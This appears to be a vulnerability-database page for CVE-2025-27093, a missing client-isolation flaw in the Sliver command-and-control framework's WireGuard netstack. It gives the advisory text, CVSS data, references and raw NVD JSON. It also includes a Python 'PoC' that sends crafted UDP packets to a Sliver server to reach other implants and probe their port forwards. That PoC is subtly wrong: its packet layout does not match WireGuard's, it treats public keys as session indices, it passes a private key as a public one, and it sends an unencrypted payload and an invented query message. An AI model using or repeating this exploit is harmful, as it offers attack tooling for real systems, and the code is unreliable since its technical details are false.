Security Vulnerability Report
CVE-2025-27093 CVSS 6.3 MEDIUM

CVE-2025-27093

Published: 2025-10-28 20:15:48
Last Modified: 2026-04-15 00:35:42

Description

Sliver is a command and control framework that uses a custom Wireguard netstack. In versions 1.5.43 and earlier, and in development version 1.6.0-dev, the netstack does not limit traffic between Wireguard clients. This allows clients to communicate with each other unrestrictedly, potentially enabling leaked or recovered keypairs to be used to attack operators or allowing port forwardings to be accessible from other implants.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Sliver <= 1.5.43
Sliver 1.6.0-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-27093 PoC - Sliver Wireguard Client-to-Client Traffic Isolation Bypass
# This PoC demonstrates the lack of traffic isolation between Sliver wireguard clients
import socket
import struct
import time


def create_wireguard_packet(src_pubkey, dst_pubkey, payload):
    """
    Craft a Wireguard packet to send directly between clients.
    In vulnerable Sliver versions, no server-side validation exists.
    """
    # Wireguard packet header structure
    packet_type = 0x04  # Transport data packet
    reserved = bytes([0] * 3)

    # Construct the packet
    header = struct.pack('>I', packet_type) + reserved
    receiver = dst_pubkey  # Target client public key
    sender = src_pubkey  # Attacker public key

    # Encrypted payload would go here (simplified for demonstration)
    encrypted_payload = payload

    return header + receiver + sender + encrypted_payload


def exploit_sliver_client_isolation(target_ip, target_port, attacker_privkey, target_pubkey):
    """
    Exploit the client isolation bypass to communicate with other implants.
    """
    try:
        # Craft a packet as if from the attacker implant
        packet = create_wireguard_packet(
            attacker_privkey,  # Attacker's public key
            target_pubkey,  # Target implant's public key
            b'\x01\x00\x00\x00'  # Control message
        )

        # Send directly to the Sliver server
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(packet, (target_ip, target_port))

        print(f"[+] Packet sent to {target_ip}:{target_port}")
        print(f"[+] Target implant: {target_pubkey.hex()}")
        print("[+] In vulnerable versions, this packet reaches the target implant directly")

        # Try to receive response
        try:
            data, addr = sock.recvfrom(4096)
            print(f"[+] Received response from {addr}: {data.hex()}")
        except socket.timeout:
            print("[-] No response received (may indicate patch or wrong target)")

        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def scan_for_exposed_port_forwards(sliver_server_ip, port):
    """
    Attempt to access port forwards from other implants.
    """
    try:
        # Connect directly to the Sliver server's wireguard interface
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(3)

        # Craft connection request to access another implant's port forward
        request = b'PORTFWD_QUERY' + struct.pack('>H', port)
        sock.sendto(request, (sliver_server_ip, 51820))

        print(f"[+] Sent port forward query for port {port}")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error scanning port forwards: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-27093 - Sliver Wireguard Client Isolation Bypass")
    print("=" * 60)

    # Configuration - replace with actual values
    sliver_server = "192.168.1.100"
    port = 51820
    attacker_key = bytes.fromhex("" + "00" * 32)
    target_key = bytes.fromhex("" + "11" * 32)

    # Exploit client-to-client communication
    exploit_sliver_client_isolation(sliver_server, port, attacker_key, target_key)

    # Try to access exposed port forwards
    scan_for_exposed_port_forwards(sliver_server, 8080)
```

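References

https://github.com/BishopFox/sliver/commit/8e5c5f14506d6d60ebb3362e6b9857ab1e0d76ff
https://github.com/BishopFox/sliver/commit/9122878cbbcae543eb8210f616550382af2065fd
https://github.com/BishopFox/sliver/security/advisories/GHSA-q8j9-34qf-7vq7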

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-27093",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-28T20:15:47.897",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Sliver is a command and control framework that uses a custom Wireguard netstack. In versions 1.5.43 and earlier, and in development version 1.6.0-dev, the netstack does not limit traffic between Wireguard clients. This allows clients to communicate with each other unrestrictedly, potentially enabling leaked or recovered keypairs to be used to attack operators or allowing port forwardings to be accessible from other implants."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/BishopFox/sliver/commit/8e5c5f14506d6d60ebb3362e6b9857ab1e0d76ff",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/BishopFox/sliver/commit/9122878cbbcae543eb8210f616550382af2065fd",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-q8j9-34qf-7vq7",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-q8j9-34qf-7vq7",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```